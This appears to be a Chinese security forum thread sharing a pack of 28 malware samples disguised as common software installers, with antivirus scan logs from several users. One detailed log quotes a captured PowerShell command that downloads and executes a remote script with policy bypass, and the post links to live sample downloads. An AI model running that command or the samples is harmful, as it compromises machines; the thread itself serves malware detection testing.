收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 28X
123下一页
返回列表 发新帖
查看: 3139|回复: 24
收起左侧

[病毒样本] 28X

[复制链接]
hsks
发表于 2024-8-17 00:35:37 | 显示全部楼层 |阅读模式
本帖最后由 hsks 于 2024-8-17 06:13 编辑

看图说话(
报hacktool,PUA,Adware之类的都没找到病根(
https://wormhole.app/4OMan#qWwQk9JJnPEsFnFv5ld26A
https://f.ws28.cn/f/euuu15osajx
https://pan.xiaomuxi.cn/s/e7jRhX
https://www.123pan.com/s/FJUmjv-NM6N
https://pan.huang1111.cn/s/Zqj8ntL



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +30 收起 理由
QVM360 + 30 版区有你更精彩: )

查看全部评分

回复

举报

ジ蓅暒划过づ
发表于 2024-8-17 00:36:19 | 显示全部楼层
本帖最后由 ジ蓅暒划过づ 于 2024-8-17 01:20 编辑

ESET 扫描12X 剩余16X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

hsks
 楼主| 发表于 2024-8-17 00:36:54 | 显示全部楼层
ジ蓅暒划过づ 发表于 2024-8-17 00:36
ESET占位

再过个把小时吧(
回复

举报

ジ蓅暒划过づ
发表于 2024-8-17 00:53:52 | 显示全部楼层
hsks 发表于 2024-8-17 00:36
再过个把小时吧(

好大!!
回复

举报

ANY.LNK
发表于 2024-8-17 01:44:23 | 显示全部楼层
微软:emmm……

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

莒县小哥
发表于 2024-8-17 07:58:04 | 显示全部楼层
ANY.LNK 发表于 2024-8-17 01:44
微软:emmm……

补一个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

klub
发表于 2024-8-17 08:30:46 来自手机 | 显示全部楼层
一直困惑,是什么原因差距这么大?
回复

举报

dght432
发表于 2024-8-17 08:39:15 | 显示全部楼层
本帖最后由 dght432 于 2024-8-17 08:56 编辑

卡巴占位,好大的包啊




剩余17个



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

UNknownOoo
发表于 2024-8-17 08:49:43 | 显示全部楼层
本帖最后由 UNknownOoo 于 2024-8-17 09:54 编辑

火绒
扫描:12x(实际处理后剩余18x
  1. 病毒库时间:2024-08-16 19:27
  2. 开始时间:2024-08-17 08:54
  3. 总计用时:00:00:36
  4. 扫描对象:8686
  5. 扫描文件:28
  6. 发现风险:12
  7. 已处理风险:12
  8. 病毒详情:
  9. 风险路径:C:\Users\Administrator\Desktop\28X\DibLookEx4.exe, 病毒名:TrojanDownloader/Lotok.bz, 病毒ID:e0890e16b3f91661, 处理结果:已处理,删除文件
  10. 风险路径:C:\Users\Administrator\Desktop\28X\GooGle最新版8.10.exe, 病毒名:HackTool/DetectDee.a, 病毒ID:9bdbd47d15e8dceb, 处理结果:已处理,删除文件
  11. 风险路径:C:\Users\Administrator\Desktop\28X\goind.exe, 病毒名:Trojan/FakeApp.z, 病毒ID:cd77a12bbf9d6cfb, 处理结果:已处理,删除文件
  12. 风险路径:C:\Users\Administrator\Desktop\28X\Kuai-18.exe, 病毒名:Trojan/BAT.Starter.ce, 病毒ID:e8f565ceb7fab691, 处理结果:已处理,删除文件
  13. 风险路径:C:\Users\Administrator\Desktop\28X\Kuai[过滤]-t.exe, 病毒名:Trojan/BAT.Starter.ce, 病毒ID:e8f565ceb7fab691, 处理结果:已处理,删除文件
  14. 风险路径:C:\Users\Administrator\Desktop\28X\kuailian.msi, 病毒名:Trojan/HTML.Agent.an, 病毒ID:902eeb2873695a08, 处理结果:已处理,删除文件
  15. 风险路径:C:\Users\Administrator\Desktop\28X\kuailian.msi, 病毒名:Trojan/BAT.Runner.p, 病毒ID:efba62601c3b765d, 处理结果:已处理,删除文件
  16. 风险路径:C:\Users\Administrator\Desktop\28X\UCK (2).exe, 病毒名:Trojan/Injector.bhp, 病毒ID:8907d00f9644703e, 处理结果:已处理,删除文件
  17. 风险路径:C:\Users\Administrator\Desktop\28X\s-2024.msi, 病毒名:Trojan/HTML.Agent.an, 病毒ID:902eeb2873695a08, 处理结果:已处理,删除文件
  18. 风险路径:C:\Users\Administrator\Desktop\28X\UCK.exe, 病毒名:Trojan/Injector.bsm, 病毒ID:eae78288c80f8c04, 处理结果:已处理,删除文件
  19. 风险路径:C:\Users\Administrator\Desktop\28X\s-2024.msi, 病毒名:Trojan/BAT.Runner.p, 病毒ID:efba62601c3b765d, 处理结果:已处理,删除文件
  20. 风险路径:C:\Users\Administrator\Desktop\28X\WPS Office 2.01.4.13.exe, 病毒名:HEUR:Backdoor/Lotok.bb, 病毒ID:d46826b55974cb62, 处理结果:已处理,删除文件
复制代码

剩下运行:
aicoin-latestx64.exe -> 内存防护捉(误报?)
  1. 病毒名称:Ransom/Filecoder.cd
  2. 病毒ID:AE57D84F78B7ABE5
  3. 虚拟地址:0x0000000003E90000
  4. 映像大小:4.1MB
  5. 是否完整映像:是
  6. 数据流哈希:a17d0894
  7. 操作结果:已处理
  8. 进程ID:1188
  9. 操作进程:C:\AICoin2.10.10.2 VtVzy2c1Q\aicoin\WdsUnattend.exe
  10. 操作进程命令行:"C:\AICoin2.10.10.2 VtVzy2c1Q\aicoin\WdsUnattend.exe" hHe
  11. 父进程ID:8964
  12. 父进程:C:\Users\Administrator\AppData\Local\Temp\is-4V5M2.tmp\aicoin-latestx64.tmp
  13. 父进程命令行:"C:\Users\ADMINI~1\AppData\Local\Temp\is-4V5M2.tmp\aicoin-latestx64.tmp" /SL5="$6054E,113300987,737280,C:\Users\Administrator\Desktop\28X\aicoin-latestx64.exe"
复制代码

goog-64.exe -> 实时监控捉衍生物
  1. 病毒名称:Backdoor/Lotok.fo
  2. 病毒ID:9329ED8113F6EBE6
  3. 病毒路径:C:\ProgramData\tmp\Pro_DLL.dll
  4. 操作类型:修改
  5. 操作结果:已处理,删除文件

  7. 进程ID:9148
  8. 操作进程:C:\ProgramData\7z.exe
  9. 操作进程命令行:7z.exe  x "C:\ProgramData\~22,1~3,1~13,1~0,1~16,1~18,1.zip" -o"C:\ProgramData" -p112233 -y
  10. 父进程ID:7708
  11. 父进程:C:\Windows\SysWOW64\cmd.exe
复制代码

Google Chrome X64.msi -> 实时监控捉
  1. 病毒名称:TrojanDownloader/Agent.bbd
  2. 病毒ID:0DE715D87EEB3580
  3. 病毒路径:C:\Program Files (x86)\Googlr Setup\Googlr Setup\qucc.dll
  4. 操作类型:修改
  5. 操作结果:已处理,删除文件
复制代码

Google Chrome-Setup.msi -> 同上

i4ails-5923.exe -> 手动内存扫描捉
  1. 病毒详情:
  2. 风险路径:mem://4424-0x34922a43-0x1a067520000-C:\Users\Administrator\AppData\Local\Programs\aitools\riothx8.exe, 病毒名:Backdoor/Lotok.ei, 病毒ID:dfc147455acd4b43, 处理结果:处理成功,进程已结束
复制代码

Install_x64.exe -> 实时监控捉衍生物,主防&内存防护响应,随后AMSI捉powershell
  1. 病毒名称:HEUR:Trojan/Injector.av
  2. 病毒ID:3749376D7935E9B5
  3. 病毒路径:C:\Program Files\launcher289\1.exe
  4. 操作类型:修改
  5. 操作结果:已处理,删除文件

  7. 进程ID:6492
  8. 操作进程:C:\Users\Administrator\Desktop\Install_x64.exe
  9. 操作进程命令行:"C:\Users\Administrator\Desktop\Install_x64.exe"
  10. 父进程ID:5716
  11. 父进程:C:\Windows\explorer.exe
复制代码
  1. 病毒名称:ADV:Trojan/GenInjector.I
  2. 病毒路径:C:\Program Files\launcher289\2.exe
  3. 操作结果:已处理
复制代码
  1. 病毒名称:Backdoor/Meterpreter.bd
  2. 病毒ID:428362F194D7F51D
  3. 虚拟地址:0x0000000002600000
  4. 映像大小:2.3MB
  5. 是否完整映像:否
  6. 数据流哈希:19f63c63
  7. 操作结果:已处理
  8. 进程ID:2500
  9. 操作进程:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
  10. 操作进程命令行:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
  11. 父进程ID:11032
  12. 父进程:C:\Program Files\launcher289\2.exe
  13. 父进程命令行:"C:\Program Files\launcher289\2.exe"
复制代码
  1. 病毒名称:TrojanDropper/PS.Maloader.az
  2. 病毒ID:42CBF69FF1C92AD9
  3. 病毒路径:PowerShell_FE83F4F004D1586158FFC54A9084E637A00AB5CA
  4. 操作类型:执行
  5. 操作结果:已处理,清除恶意代码

  7. 进程ID:580
  8. 操作进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  9. 操作进程命令行:powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/42zzhcyga7s4bd9fnjp33ojb/raw" ) ) )                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
  10. 父进程ID:4960
  11. 父进程:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
复制代码

kg-20541.exe -> 手动内存扫描捉
  1. 病毒详情:
  2. 风险路径:mem://10344-0x8609808b-0x1c2c4820000-C:\Users\Administrator\AppData\Local\Programs\酷狗音乐\app\agentHtml\riothx8.exe, 病毒名:Backdoor/Lotok.ei, 病毒ID:dfc147455acd4b43, 处理结果:处理成功,进程已结束
复制代码

Letss[过滤].exe -> 手动内存扫描捉
  1. 病毒详情:
  2. 风险路径:mem://6260-0x54125960-0x1ae9fe50000-C:\Users\Administrator\AppData\Local\Programs\Let[过滤]\expwebax.exe, 病毒名:Backdoor/Lotok.ei, 病毒ID:dfc147455acd4b43, 处理结果:处理成功,进程已结束
复制代码

Mari.exe -> 内存防护捉
  1. 病毒名称:Backdoor/Agent.pl
  2. 病毒ID:37CFF1CC6F5EBF8A
  3. 虚拟地址:0x0000000003330000
  4. 映像大小:420KB
  5. 是否完整映像:否
  6. 数据流哈希:70d25023
  7. 操作结果:已处理
  8. 进程ID:8852
  9. 操作进程:C:\Users\Public\Documents\r4H7U\F84ZU~i\uc_ctrl.exe
  10. 操作进程命令行:"C:\Users\Public\Documents\r4H7U\F84ZU~i\uc_ctrl.exe"
  11. 父进程ID:4952
  12. 父进程:C:\Windows\System32\mmc.exe
  13. 父进程命令行:C:\Windows\system32\mmc.exe -Embedding
复制代码

P.exe -> 内存防护捉
  1. 病毒名称:Backdoor/Agent.pl
  2. 病毒ID:37CFF1CC6F5EBF8A
  3. 虚拟地址:0x00000000034F0000
  4. 映像大小:420KB
  5. 是否完整映像:否
  6. 数据流哈希:b809a6ca
  7. 操作结果:已处理
  8. 进程ID:11180
  9. 操作进程:C:\Users\Public\Documents\x40Zj\PN5Rw~z1\uc_ctrl.exe
  10. 操作进程命令行:"C:\Users\Public\Documents\x40Zj\PN5Rw~z1\uc_ctrl.exe"
  11. 父进程ID:5204
  12. 父进程:C:\Windows\System32\mmc.exe
  13. 父进程命令行:C:\Windows\system32\mmc.exe -Embedding
复制代码

sgX64_278.exe -> 手动内存扫描捉
  1. 病毒详情:
  2. 风险路径:mem://7732-0xde5c7c9f-0x27da1770000-C:\Users\Administrator\AppData\Local\Programs\sogoipt\app\agentHtml\riothx8.exe, 病毒名:Backdoor/Lotok.ei, 病毒ID:dfc147455acd4b43, 处理结果:处理成功,进程已结束
复制代码


sunlogin.exe -> 下载太慢放弃挣扎(


tradingviewx64.exe -> 内存防护捉
  1. 病毒名称:Ransom/Filecoder.cd
  2. 病毒ID:AE57D84F78B7ABE5
  3. 虚拟地址:0x00000000035C0000
  4. 映像大小:4.1MB
  5. 是否完整映像:是
  6. 数据流哈希:8c562ea0
  7. 操作结果:已处理
  8. 进程ID:9472
  9. 操作进程:C:\TradingView Desktop6.1.5.3 xKzd\appreascv\BdeH.exe
  10. 操作进程命令行:"C:\TradingView Desktop6.1.5.3 xKzd\appreascv\BdeH.exe"
  11. 父进程ID:5952
  12. 父进程:C:\Windows\explorer.exe
  13. 父进程命令行:C:\Windows\Explorer.EXE
复制代码

win32-quickq.exe -> 实时监控捉衍生物
  1. 病毒名称:Backdoor/Lotok.db
  2. 病毒ID:EF40633B1E27719B
  3. 病毒路径:C:\Program Files (x86)\u1.exe
  4. 操作类型:修改
  5. 操作结果:已处理,删除文件
复制代码

WPS Office_12.1.1.exe -> 实时监控捉衍生物
  1. 病毒名称:Trojan/HiJack.hb
  2. 病毒ID:1E80486F157A524E
  3. 病毒路径:C:\Program Files (x86)\WindowsInstallerRH\B3EFC20\WHelp.dll
  4. 操作类型:修改
  5. 操作结果:已处理,删除文件

  7. 病毒名称:Trojan/HiJack.hb
  8. 病毒ID:1E80486F157A524E
  9. 病毒路径:C:\Users\Default\Desktop\SeILTPBQCKHG\WHelp.dll
  10. 操作类型:修改
  11. 操作结果:已处理,删除文件
复制代码

X64-3981.exe -> 衍生物自退?

yi.exe -> 内存防护捉衍生物
  1. 病毒名称:Backdoor/Agent.pl
  2. 病毒ID:37CFF1CC6F5EBF8A
  3. 虚拟地址:0x0000000003640000
  4. 映像大小:420KB
  5. 是否完整映像:是
  6. 数据流哈希:eae0e4f0
  7. 操作结果:已处理
  8. 进程ID:3008
  9. 操作进程:C:\Users\Public\Pictures\01TvA\gZh76~z\QKWebGame.exe
  10. 操作进程命令行:"C:\Users\Public\Pictures\01TvA\gZh76~z\QKWebGame.exe"
  11. 父进程ID:4556
  12. 父进程:C:\Windows\System32\mmc.exe
  13. 父进程命令行:C:\Windows\system32\mmc.exe -Embedding
复制代码

youdao-fanyi.exe -> MISS

回复

举报

筑梦
发表于 2024-8-17 09:04:07 | 显示全部楼层
莒县小哥 发表于 2024-8-17 07:58
补一个

怎么效果不一样  是云了吗
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-14 21:50 , Processed in 0.136455 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表